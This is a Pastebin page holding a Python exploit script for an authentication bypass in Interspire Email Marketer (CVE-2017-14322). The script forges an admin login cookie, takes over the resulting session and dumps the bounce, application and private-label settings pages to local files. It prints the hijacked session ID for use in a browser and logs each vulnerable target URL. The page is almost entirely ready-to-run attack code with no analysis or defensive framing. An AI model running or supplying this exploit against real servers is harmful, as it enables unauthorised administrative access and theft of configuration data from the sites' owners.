API tools faq
paste
ToKeiChun

Interspire Email Marketer - Remote Admin Authentication Bypa

ToKeiChun
Jul 7th, 2019 (edited)
273
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.05 KB | None | 0 0
raw download clone embed print report
  1. import requests
  2. import sys
  3. from bs4 import BeautifulSoup
  4. from pprint import pprint
  5.  
  6.  
  7. def cookie_cutter(url):
  8.     with requests.Session() as s:
  9.        s.get(url)
  10.        r = s.get(url)
  11.        response_regex = r.text
  12.        print("requesting initial Cookie\n")
  13.        print(str(r.headers)+"\n")
  14.        
  15.        for key,value in s.cookies.items():
  16.            if key and "IEMSESSIONID" in key:
  17.          
  18.               s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
  19.        print("Attempting To Posion 2nd request with Forged Cookie\n")
  20.        print("-" * 25)
  21.        r = s.get(url)
  22.        response_regex2 = r.text
  23.        print response_regex2
  24.        print(str(r.headers) + "\n")
  25.        if response_regex != response_regex2:
  26.  
  27.           for key,value in s.cookies.items():
  28.               if "IEMSESSIONID" in key:
  29.                  try:
  30.                     #using session riding from previous cookie we grab the info we want :)
  31.                     bounce_info_grab(url,value)
  32.                     app_info_grab(url,value)
  33.                     privt_info_grab(url,value)
  34.                  except:
  35.                      pass
  36.                  return value,r.text
  37.  
  38.  
  39. def bounce_info_grab(url,session_to_ride):
  40.     url_grab = url+"?Page=Settings&Tab=2"
  41.     print(url_grab)
  42.     with requests.Session() as s:
  43.        s.get(url_grab)
  44.        s.cookies.set('IEMSESSIONID',session_to_ride)
  45.        r = s.get(url_grab)
  46.        response_regex = r.text
  47.        soup = BeautifulSoup(response_regex,'html5lib')
  48.        div = soup.find('div', id='div7')
  49.      
  50.        
  51.        outfile = open("bounce_report.txt",'w')
  52.        dataout = """<html><head>Report</head><title>Report</title>
  53.                    <body>""" + str(div) +"""</body></html>"""
  54.        outfile.write(dataout)
  55.        outfile.close()
  56.        for divy in div.contents:
  57.            print(divy)
  58.          
  59. def app_info_grab(url,session_to_ride):
  60.     url_grab = url+"?Page=Settings&Tab=2"
  61.     print(url_grab)
  62.     with requests.Session() as s:
  63.        s.get(url_grab)
  64.        s.cookies.set('IEMSESSIONID',session_to_ride)
  65.        r = s.get(url_grab)
  66.        response_regex = r.text
  67.        soup = BeautifulSoup(response_regex,'html5lib')
  68.        div = soup.find('div', id='div1')
  69.    
  70.        
  71.        outfile = open("application_settings_report.txt",'w')
  72.        dataout = """<html><head>Report</head><title>Report</title>
  73.                    <body>""" + str(div) +"""</body></html>"""
  74.        outfile.write(dataout)
  75.        outfile.close()
  76.        for divy in div.contents:
  77.            print(divy)  
  78.    
  79. def privt_info_grab(url,session_to_ride):
  80.     url_grab = url+"?Page=Settings&Tab=2"
  81.     print(url_grab)
  82.     with requests.Session() as s:
  83.        s.get(url_grab)
  84.        s.cookies.set('IEMSESSIONID',session_to_ride)
  85.        r = s.get(url_grab)
  86.        response_regex = r.text
  87.        soup = BeautifulSoup(response_regex,'html5lib')
  88.        div = soup.find('div', id='div8')
  89.      
  90.        
  91.        outfile = open("privtlbl_settings_report.txt",'w')
  92.        dataout = """<html><head>Report</head><title>Report</title>
  93.                    <body>""" + str(div) +"""</body></html>"""
  94.        outfile.write(dataout)
  95.        outfile.close()
  96.        for divy in div.contents:
  97.            print(divy)  
  98.    
  99. def main():
  100.     url = sys.argv[1]
  101.     print  "Evaluating Target:" +url+ """ For CVE-2017-14322"""+"\n"
  102.     print "-" * 25
  103.     try:
  104.        session_rider_value,content = cookie_cutter(url)
  105.        print "Session Has Been Generated Entering Internal Data Dumping Routine"+"\n"
  106.        print "-" * 25
  107.        print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
  108.        print "-" * 25
  109.        print  session_rider_value+"\n"
  110.        print "-" * 25
  111.        outfile = open("vulnbypass.txt",'a')
  112.        dataout = url+session_rider_value+"\n"
  113.        outfile.write(dataout)
  114.        outfile.close()
  115.     except:
  116.        print "Target Is Not Vulnerable"
  117.        pass
  118.    
  119.    
  120.  
  121. main()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!